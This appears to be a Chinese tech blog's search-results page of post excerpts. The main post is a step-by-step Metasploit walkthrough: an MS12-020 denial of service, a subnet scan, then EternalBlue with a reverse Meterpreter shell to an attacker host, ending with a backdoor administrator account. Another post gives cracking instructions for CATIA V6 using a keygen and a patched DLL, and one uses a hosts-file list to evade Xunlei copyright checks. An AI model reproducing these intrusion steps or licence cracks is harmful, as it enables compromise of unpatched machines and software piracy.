搜索到
244
篇与
的结果
-
Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞 MetasploitMetasploit是什么?Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它是附带数百个已知软件漏洞的专业级漏洞攻击工具。如果这样很难理解,我们换个说法;每天都有无数的漏洞被发现,如果我们每个人都收集几种并汇聚到一起,修改为相同的操作方式,这就是msf在做的;msf初衷是做一个攻击工具开发平台,但现在更多的情况下msf沦为了业余安全爱好者和安全专家的武器库,只需要点几下鼠标,就能入侵成功。MS12-020MS12-020是一个针对远程桌面(RDP)协议的漏洞,其最严重的情况可能会造成远程执行代码,而通常情况下会造成对方蓝屏。利用方法msfconsole 从终端进入msf框架查找漏洞代码msf > search 12_020 [!] Module database cache not built yet, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal MS12-020 Microsoft Remote Desktop Use-After-Free DoS auxiliary/scanner/rdp/ms12_020_check normal MS12-020 Microsoft Remote Desktop Checker 使用该漏洞利用代码msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 查看使用方法msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 3389 yes The target port (TCP) 漏洞模块为auxiliary/dos/windows/rdp/ms12_020_maxchannelids参数为 RHOST目标地址,RPORT目标端口。设置参数msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RHOST 192.168.136.129 RHOST => 192.168.136.129 msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RPORT 3389 RPORT => 3389 msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.136.129 yes The target address RPORT 3389 yes The target port (TCP) 运行msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > exploit [*] 192.168.136.129:3389 - 192.168.136.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS [*] 192.168.136.129:3389 - 192.168.136.129:3389 - 210 bytes sent [*] 192.168.136.129:3389 - 192.168.136.129:3389 - Checking RDP status... [+] 192.168.136.129:3389 - 192.168.136.129:3389 seems down [*] Auxiliary module execution completed 攻击完成对方蓝屏MS12-020是msf中利用比较简单的一种,可以用来学习msf的框架的简单使用方法,又能快速增加入侵成功的成就感。MS17-010(永恒之蓝)永恒之蓝是2017年席卷全球的勒索软件的罪魁祸首,是微软近些年来最为严重的远程代码执行漏洞,可以直接获得系统权限,请所有IT从业人员在任何时候都要打满补丁以绝后患。利用方法进入msf框架root@kali:~# msfconsole 查找MS17-010相关利用代码search 17_010 [!] Module database cache not built yet, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 检测内网中存在漏洞的主机系统 msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(scanner/smb/smb_ms17_010) > show options Module options (auxiliary/scanner/smb/smb_ms17_010): Name Current Setting Required Description ---- --------------- -------- ----------- CHECK_ARCH true no Check for architecture on vulnerable hosts CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts CHECK_PIPE false no Check for named pipe on vulnerable hosts NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The SMB service port (TCP) SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.136.129/24 RHOSTS => 192.168.136.129/24 msf auxiliary(scanner/smb/smb_ms17_010) > exploit [*] Scanned 26 of 256 hosts (10% complete) [*] Scanned 52 of 256 hosts (20% complete) [*] Scanned 77 of 256 hosts (30% complete) [*] Scanned 103 of 256 hosts (40% complete) [*] Scanned 128 of 256 hosts (50% complete) [+] 192.168.136.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit) 加载攻击模块msf auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue msf exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target. Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs 配置msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.136.129 RHOST => 192.168.136.129 msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.136.131 LHOST => 192.168.136.131 msf exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- GroomAllocations 12 yes Initial number of times to groom the kernel pool. GroomDelta 5 yes The amount to increase the groom count by per try. MaxExploitAttempts 3 yes The number of times to retry the exploit. ProcessName spoolsv.exe yes Process to inject payload into. RHOST 192.168.136.129 yes The target address RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VerifyArch true yes Check if remote architecture matches exploit Target. VerifyTarget true yes Check if remote OS matches exploit Target. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.136.131 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs 发动攻击msf exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on 192.168.136.131:4444 [*] 192.168.136.129:445 - Connecting to target for exploitation. [+] 192.168.136.129:445 - Connection established for exploitation. [+] 192.168.136.129:445 - Target OS selected valid for OS indicated by SMB reply [*] 192.168.136.129:445 - CORE raw buffer dump (53 bytes) [*] 192.168.136.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 192.168.136.129:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris [*] 192.168.136.129:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P [*] 192.168.136.129:445 - 0x00000030 61 63 6b 20 31 ack 1 [+] 192.168.136.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 192.168.136.129:445 - Trying exploit with 12 Groom Allocations. [*] 192.168.136.129:445 - Sending all but last fragment of exploit packet [*] 192.168.136.129:445 - Starting non-paged pool grooming [+] 192.168.136.129:445 - Sending SMBv2 buffers [+] 192.168.136.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 192.168.136.129:445 - Sending final SMBv2 buffers. [*] 192.168.136.129:445 - Sending last fragment of exploit packet! [*] 192.168.136.129:445 - Receiving response from exploit packet [+] 192.168.136.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 192.168.136.129:445 - Sending egg to corrupted connection. [*] 192.168.136.129:445 - Triggering free of corrupted buffer. [*] Sending stage (206403 bytes) to 192.168.136.129 [*] Meterpreter session 1 opened (192.168.136.131:4444 -> 192.168.136.129:49567) at 2018-04-30 23:31:53 +0800 [+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 192.168.136.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 获取对方电脑桌面meterpreter > screenshot Screenshot saved to: /root/VrBAGsTE.jpeg 获得shell权限meterpreter > shell Process 4088 created. Channel 1 created. Microsoft Windows [�汾 6.1.7601] ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ���� C:\Windows\system32> 添加管理员并加入远程桌面组net user test test123 /add net user localgroup administrators test /add net localgroup "Remote Desktop Users" test /add 完成入侵。MS17-010在msf里属于中等使用难度,涉及了扫描、配置回链方式、桌面抓图、提权等手段,是非常好的学习对象。 -
-
CATIA V6 2017破解教程 下载地址和教程http://www.ddooo.com/softdown/99519.htm开始安装安全安装,其他都默认安装后不启动打开“_SolidSQUAD_”文件夹,以管理员方式运行“DSLS_SSQ_V6R2017x_Installer_20170620.exe”,根据提示完成安装安装完成后,弹出许可设置,将计算机全名复制到“许可证服务器名称”中点击OK,端口不需要修改有些系统下不弹,如果默认有当前计算机的信息跳过该步骤即可,如果没有可以在左上角服务器新建当前电脑信息。点击左上角的插头图标,然后右键点击我们刚才设置的许可,选择显示特性,弹出用户信息回到“_SolidSQUAD_”目录,运行“DSLS.LicGen.v1.6.SSQ.exe”,将Name和ID输入到注册机中,点击GENERATEL生成许可文件并将其放置到桌面回到许可证界面,点击第四个图标,载入刚才生成的许可回到安装包破解目录下,打开“Client”目录,这里有win32和win64两个文件夹对应不同的系统,我们选择符合系统的版本打开,将破解文件“netapi32.dll”(复制到软件bin目录下,默认路径C:\Program Files\Dassault Systemes\B26\win_b64\code\bin然后将“ProgramData”文件夹复制到C盘根目录下覆盖源文件回到许可界面,点击左上角的插头图标,这时候小电脑会变成蓝色,运行桌面CATIAV6R2017快捷方式,选择授权即可开始体验运行
-
二维码名片vCard制作工具 什么是vCard?参考维基百科:https://zh.wikipedia.org/wiki/VCardvCard(或称做Versitcard)最早是由Versit联盟于1995年提出的,当时联盟成员包括苹果公司,AT&T科技(后来的朗讯),IBM及西门子。在1996年十二月,格式的拥有权移至互联网邮件联盟(IMC),此联盟是由一些关注互联网电子邮件的公司所组成。与vCard一同提出的用于数据交换的标准还有vCalendar,但现在被iCalendar所取代。互联网邮件联盟已经声明它希望“所有的vCalendar开发者利用这些新的开放标准,并使软件能够同时兼容vCalendar 1.0和iCalendar。”下面是一个包含个人信息的vCard文件样例。BEGIN:VCARD VERSION:2.1 N:Gump;Forrest FN:Forrest Gump ORG:Gump Shrimp Co. TITLE:Shrimp Man TEL;WORK;VOICE:(111) 555-1212 TEL;HOME;VOICE:(404) 555-1212 ADR;WORK:;;100 Waters Edge;Baytown;LA;30314;United States of America LABEL;WORK;ENCODING=QUOTED-PRINTABLE:100 Waters Edge=0D=0ABaytown, LA 30314=0D=0AUnited States of America ADR;HOME:;;42 Plantation St.;Baytown;LA;30314;United States of America LABEL;HOME;ENCODING=QUOTED-PRINTABLE:42 Plantation St.=0D=0ABaytown, LA 30314=0D=0AUnited States of America EMAIL;PREF;INTERNET:forrestgump@walladalla.com REV:20080424T195243Z END:VCARD 我们可以用专业的二维码名片制作网站在线制作http://goqr.me/#t=vcard效果
-
CentOS 7安装bbr教程 教程来源:http://www.vmvps.com/speed-up-your-vps-with-installing-bbr-to-centos-7.htmlyum系统更新yum update 2.查看系统版本cat /etc/redhat-release 输出如下,则表示已升级成功CentOS Linux release 7.3.1611 (Core) 3.安装elrepo并升级内核rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org rpm -Uvh http://www.elrepo.org/elrepo-release-7.0-2.el7.elrepo.noarch.rpm yum --enablerepo=elrepo-kernel install kernel-ml -y 正常情况下将输出如下,Transaction Summary ================================================================================ Install 1 Package Total download size: 39 M Installed size: 169 M Downloading packages: kernel-ml-4.9.0-1.el7.elrepo.x86_64.rpm | 39 MB 00:00 Running transaction check Running transaction test Transaction test succeeded Running transaction Warning: RPMDB altered outside of yum. Installing : kernel-ml-4.9.0-1.el7.elrepo.x86_64 1/1 Verifying : kernel-ml-4.9.0-1.el7.elrepo.x86_64 1/1 Installed: kernel-ml.x86_64 0:4.9.0-1.el7.elrepo Complete! 3.更新grub文件并重启(reboot后,ssh会断开,稍等一会儿重新连接)egrep ^menuentry /etc/grub2.cfg | cut -f 2 -d \' grub2-set-default 0 reboot 4.开机后查看内核是否已更换为4.9以及以后的版本uname -r 输出如下内容则表示内核4.13已经启动了4.13.0-1.el7.elrepo.x86_64 5.开启bbrvi /etc/sysctl.conf 添加如下内容net.core.default_qdisc = fq net.ipv4.tcp_congestion_control = bbr 加载系统参数(正常情况下会输出我们之前加入的内容)sysctl -p 4.确定bbr已经开启若sysctl net.ipv4.tcp_available_congestion_control返回net.ipv4.tcp_available_congestion_control = bbr cubic reno 则成功若lsmod | grep bbr返回形如tcp_bbr 16384 1 则成功
-
修改hosts解决迅雷版权提示,任务出错问题。 127.0.0.1 hub5btmain.sandai.net 127.0.0.1 hub5emu.sandai.net 127.0.0.1 upgrade.xl9.xunlei.com 127.0.0.1 hub5u.sandai.net 127.0.0.1 hub5t.sandai.net 127.0.0.1 hub5pr.sandai.net 127.0.0.1 service.lixian.vip.xunlei.com 127.0.0.1 viphub5pr.phub.sandai.net 127.0.0.1 hub5sr.sandai.net 127.0.0.1 hub5c.sandai.net 127.0.0.1 hub5p.sandai.net 127.0.0.1 hubstat.sandai.net 127.0.0.1 reg2t.sandai.net 127.0.0.1 spctrl.sandai.net 127.0.0.1 imhub5pr.sandai.net 127.0.0.1 bwcheck.sandai.net 127.0.0.1 hubciddata.sandai.net 127.0.0.1 liveupdate.mac.sandai.net
-
化茧成蝶,解锁苹果的神秘力量。 -越狱 我不是一个果粉,但却是一个纯正的iPhone粉,比iPhone更好的手机?不存在的!苹果拥有顶尖的硬件和无与伦比的生态系统,每个app都能快速完美的运行。苹果没有的,就是不需要的。苹果拥有的,大家就都去学习。直到有一天我发现,苹果怎么没有通话录音?在彻底找遍整个系统后,我不得不求助于搜索引擎。没错,是真的没有。难道iPhone不是世界上最优秀的手机了?难道这么多优秀的iPhone用户都没有发现这个问题?直到我发现越狱针对苹果操作系统(IOS系统)限制用户存储读写权限的破解操作,经过越狱的iPhone拥有对系统底层的读写权限,可以让用户对系统实现100%自定义,等同于安卓的root。越狱方法越狱推荐使用pp助手和爱思助手的一键越狱,以pp助手为例。安装运行pp助手,一键越狱信任描述文件运行越狱助手越狱完成为cydia配置雷锋源https://apt.abcydia.com/pcindex.html安装各种插件例如NFC来电归属地、通话录音、来电震动、自定义铃声、文件管理器、界面自定义、屏幕录像等等。果然苹果还是世界上最好的手机,哈哈哈哈哈哈哈哈哈哈哈。
-
-
-
-
玩转树莓派之一些基础命令、远程端口映射与web版BT下载 pi@pi2:~$ screenfetch ./+o+- pi@pi2 yyyyy- -yyyyyy+ OS: Ubuntu 16.04 xenial ://+//////-yyyyyyo Kernel: armv7l Linux 4.4.38-v7+ .++ .:/++++++/-.+sss/` Uptime: 2h 2m .:++o: /++++++++/:--:/- Packages: 1919 o:+o+:++.`..```.-/oo+++++/ Shell: 1180 .:+o:+o/. `+sssoo+/ Resolution: 2560x1080 .++/+:+oo+o:` /sssooo. WM: Not Found /+++//+:`oo+o /::--:. CPU: ARMv7 rev 5 (v7l) @ 900MHz \+/+o+++`o++o ++////. GPU: Gallium 0.4 on llvmpipe (LLVM 3.8, 128 bits) .++.o+++oo+:` /dddhhh. RAM: 179MiB / 925MiB .+.o+oo:. `oddhhhh+ \+.++o+o``-````.:ohdhhhhh+ `:o+++ `ohhhhhhhhyo++os: .o:`.syhhhhhhh/.oo++o` /osyyyyyyo++ooo+++/ ````` +oo+++o\: `oo++. 我们都喜欢好玩的事情,因为好玩我们才更加喜欢他 --好像是鲁迅上面这句我没说过 --鲁迅
-
